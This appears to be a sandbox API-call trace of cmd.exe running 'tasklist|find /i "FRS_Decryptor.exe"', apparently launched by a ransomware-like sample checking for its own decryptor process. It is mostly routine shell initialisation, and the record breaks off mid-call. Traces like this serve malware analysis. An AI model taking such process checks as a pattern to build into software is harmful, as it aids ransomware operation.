Thread: id = 298 os_tid = 0x580 [0109.254] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0109.254] __set_app_type (_Type=0x1) [0109.254] __p__fmode () returned 0x76ea1768 [0109.254] __p__commode () returned 0x76ea176c [0109.254] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0109.254] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0109.255] GetCurrentThreadId () returned 0x580 [0109.255] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x580) returned 0x34 [0109.255] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0109.255] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0109.255] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.257] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.257] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x94f9ac | out: phkResult=0x94f9ac*=0x0) returned 0x2 [0109.257] VirtualQuery (in: lpAddress=0x94f9bb, lpBuffer=0x94f954, dwLength=0x1c | out: lpBuffer=0x94f954*(BaseAddress=0x94f000, AllocationBase=0x850000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.257] VirtualQuery (in: lpAddress=0x850000, lpBuffer=0x94f954, dwLength=0x1c | out: lpBuffer=0x94f954*(BaseAddress=0x850000, AllocationBase=0x850000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0109.257] VirtualQuery (in: lpAddress=0x851000, lpBuffer=0x94f954, dwLength=0x1c | out: lpBuffer=0x94f954*(BaseAddress=0x851000, AllocationBase=0x850000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0109.257] VirtualQuery (in: lpAddress=0x853000, lpBuffer=0x94f954, dwLength=0x1c | out: lpBuffer=0x94f954*(BaseAddress=0x853000, AllocationBase=0x850000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.257] VirtualQuery (in: lpAddress=0x950000, lpBuffer=0x94f954, dwLength=0x1c | out: lpBuffer=0x94f954*(BaseAddress=0x950000, AllocationBase=0x950000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0109.257] GetConsoleOutputCP () returned 0x1b5 [0109.257] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0109.257] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0109.257] _get_osfhandle (_FileHandle=1) returned 0x318 [0109.257] SetConsoleMode (hConsoleHandle=0x318, dwMode=0x0) returned 0 [0109.257] _get_osfhandle (_FileHandle=1) returned 0x318 [0109.257] GetConsoleMode (in: hConsoleHandle=0x318, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0109.257] _get_osfhandle (_FileHandle=0) returned 0x24 [0109.257] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0109.258] GetEnvironmentStringsW () returned 0xb240c0* [0109.258] FreeEnvironmentStringsA (penv="=") returned 1 [0109.258] GetEnvironmentStringsW () returned 0xb240c0* [0109.258] FreeEnvironmentStringsA (penv="=") returned 1 [0109.258] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x94e8fc | out: phkResult=0x94e8fc*=0x44) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x0, lpData=0x94e908*=0xb2, lpcbData=0x94e900*=0x1000) returned 0x2 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x4, lpData=0x94e908*=0x1, lpcbData=0x94e900*=0x4) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x0, lpData=0x94e908*=0x1, lpcbData=0x94e900*=0x1000) returned 0x2 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x4, lpData=0x94e908*=0x0, lpcbData=0x94e900*=0x4) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x4, lpData=0x94e908*=0x40, lpcbData=0x94e900*=0x4) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x4, lpData=0x94e908*=0x40, lpcbData=0x94e900*=0x4) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x0, lpData=0x94e908*=0x40, lpcbData=0x94e900*=0x1000) returned 0x2 [0109.258] RegCloseKey (hKey=0x44) returned 0x0 [0109.258] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x94e8fc | out: phkResult=0x94e8fc*=0x44) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x0, lpData=0x94e908*=0x40, lpcbData=0x94e900*=0x1000) returned 0x2 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x4, lpData=0x94e908*=0x1, lpcbData=0x94e900*=0x4) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x0, lpData=0x94e908*=0x1, lpcbData=0x94e900*=0x1000) returned 0x2 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x4, lpData=0x94e908*=0x0, lpcbData=0x94e900*=0x4) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x4, lpData=0x94e908*=0x9, lpcbData=0x94e900*=0x4) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x4, lpData=0x94e908*=0x9, lpcbData=0x94e900*=0x4) returned 0x0 [0109.258] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x94e904, lpData=0x94e908, lpcbData=0x94e900*=0x1000 | out: lpType=0x94e904*=0x0, lpData=0x94e908*=0x9, lpcbData=0x94e900*=0x1000) returned 0x2 [0109.258] RegCloseKey (hKey=0x44) returned 0x0 [0109.259] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50098 [0109.259] srand (_Seed=0x5aa50098) [0109.259] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0109.259] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0109.259] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0109.259] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb240c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0109.259] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.259] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.259] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0109.259] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.259] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0109.259] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0109.259] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0109.259] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0109.259] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0109.259] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0109.259] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0109.259] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0109.259] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0109.259] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x94f6dc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0109.259] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x94f6dc, lpFilePart=0x94f6d8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x94f6d8*="Desktop") returned 0x1c [0109.259] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0109.259] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x94f458 | out: lpFindFileData=0x94f458) returned 0xb242d8 [0109.260] FindClose (in: hFindFile=0xb242d8 | out: hFindFile=0xb242d8) returned 1 [0109.260] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x94f458 | out: lpFindFileData=0x94f458) returned 0xb242d8 [0109.260] FindClose (in: hFindFile=0xb242d8 | out: hFindFile=0xb242d8) returned 1 [0109.260] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0109.260] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x94f458 | out: lpFindFileData=0x94f458) returned 0xb242d8 [0109.260] FindClose (in: hFindFile=0xb242d8 | out: hFindFile=0xb242d8) returned 1 [0109.260] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0109.260] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0109.260] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0109.260] GetEnvironmentStringsW () returned 0xb26190* [0109.260] FreeEnvironmentStringsA (penv="=") returned 1 [0109.260] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0109.261] GetConsoleOutputCP () returned 0x1b5 [0109.261] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0109.261] GetUserDefaultLCID () returned 0x409 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x94f808, cchData=128 | out: lpLCData="0") returned 2 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x94f808, cchData=128 | out: lpLCData="0") returned 2 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x94f808, cchData=128 | out: lpLCData="1") returned 2 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0109.261] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0109.262] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0109.262] GetConsoleTitleW (in: lpConsoleTitle=0xb24e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0109.263] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0109.263] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0109.263] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0109.263] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0109.263] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0109.263] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0109.263] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0109.263] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0109.263] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0109.263] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0109.263] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0109.264] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0109.264] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0109.264] _wcsicmp (_String1="IF", _String2="find") returned 3 [0109.264] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0109.264] _wcsicmp (_String1="REM", _String2="find") returned 12 [0109.264] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0109.265] _pipe (in: _PtHandles=0xb251f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xb251f0) returned 0 [0109.265] _dup (_FileHandle=1) returned 5 [0109.265] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0109.265] _close (_FileHandle=4) returned 0 [0109.265] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0109.265] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0109.265] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0109.265] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0109.265] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0109.265] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0109.265] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0109.265] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0109.265] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0109.265] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0109.265] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0109.265] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0109.265] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0109.266] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0109.266] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0109.266] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0109.266] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0109.266] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0109.266] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0109.266] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0109.266] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0109.266] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0109.266] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0109.266] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0109.266] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0109.266] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0109.266] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0109.266] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0109.266] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0109.266] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0109.266] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0109.266] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0109.266] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0109.266] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0109.266] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0109.266] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0109.266] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0109.266] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0109.266] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0109.266] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0109.266] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0109.266] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0109.266] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0109.266] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0109.266] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0109.266] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0109.266] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0109.266] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0109.266] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0109.266] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0109.266] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0109.266] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0109.266] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0109.266] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0109.266] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0109.266] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0109.266] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0109.266] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0109.266] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0109.266] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0109.266] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0109.266] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0109.266] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0109.266] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0109.266] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0109.266] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0109.266] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0109.266] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0109.267] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0109.267] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0109.267] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0109.267] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0109.267] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0109.267] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0109.267] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0109.267] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0109.267] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0109.267] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0109.267] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0109.267] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0109.267] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0109.267] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0109.267] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0109.267] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0109.267] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0109.267] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0109.267] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0109.267] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0109.267] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0109.267] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0109.267] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0109.267] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0109.267] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0109.267] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0109.267] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0109.267] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0109.267] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0109.267] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0109.267] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0109.267] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0109.267] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0109.267] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0109.267] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0109.267] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0109.267] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0109.267] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0109.267] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0109.267] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0109.267] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0109.267] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0109.268] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0109.268] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0109.268] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0109.268] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0109.268] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0109.268] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0109.268] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0109.268] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0109.268] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0109.268] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0109.268] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0109.268] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0109.268] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0109.268] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0109.268] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0109.268] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0109.268] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0109.268] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0109.268] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0109.268] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0109.268] SetErrorMode (uMode=0x0) returned 0x0 [0109.268] SetErrorMode (uMode=0x1) returned 0x0 [0109.268] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb25228, lpFilePart=0x94f664 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x94f664*="Desktop") returned 0x1c [0109.268] SetErrorMode (uMode=0x0) returned 0x1 [0109.268] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.268] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.272] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.273] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.273] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x94f3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f3f0) returned 0xffffffff [0109.273] GetLastError () returned 0x2 [0109.273] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.273] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x94f3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f3f0) returned 0xb25530 [0109.273] FindClose (in: hFindFile=0xb25530 | out: hFindFile=0xb25530) returned 1 [0109.273] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x94f3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f3f0) returned 0xffffffff [0109.273] GetLastError () returned 0x2 [0109.273] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x94f3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x94f3f0) returned 0xb25530 [0109.274] FindClose (in: hFindFile=0xb25530 | out: hFindFile=0xb25530) returned 1 [0109.274] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.274] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.274] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0109.274] SetErrorMode (uMode=0x0) returned 0x0 [0109.274] SetErrorMode (uMode=0x1) returned 0x0 [0109.274] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb2a3c0, lpFilePart=0x94f40c | 